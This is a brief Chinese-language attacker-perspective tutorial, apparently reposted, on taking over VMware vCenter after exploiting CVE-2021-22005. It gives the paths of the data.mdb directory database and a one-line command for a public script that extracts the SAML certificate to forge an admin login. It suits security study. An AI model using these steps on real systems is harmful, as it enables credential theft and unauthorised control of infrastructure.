模擬環境：

使用CVE-2021-22005獲取權限后下載data.mdb文件

vSphere：

vSphere是VMware推出的虛擬化平臺套件，包含ESXi、vCenter等一系列的軟件。

其中vCenter為 ESXi的控制中心，可從單一控制點統一管理數據中心的所有vSphere主機和虛擬機，使得運維能夠提高控制能力，也使我們作為攻擊者能夠更快速的對權限進行獲取。

vSphere5開始引入了單點登錄系統，同時使用SAML作為授權服務支持。當用戶登錄服務時，該服務會將身份驗證請求轉發給 SAML 。SAML 驗證用戶憑據是否正確以及他們是否有權訪問指定的服務。

位置：

Linux-data.mdb文件位置:

/storage/db/vmware-vmdir/data.mdb

Windows-data.mdb文件位置:

C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb

使用更快捷的腳本從data.mdb 文件的目錄服務信息中提取LDP 證書并登錄 vCenter

此處應注意將Python能否與目標vCenter通信

https://github.com/horizon3ai/vcenter_saml_login

python3 vcenter_saml_login.py -p data.mdb -t 192.168.0.92

獲取到Cookie后后添加并訪問?https://192.168.xx.xx/ui

后滲透-利用SAML證書登錄vCenter

總結

以上是生活随笔為你收集整理的利用SAML证书登陆vCenter的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。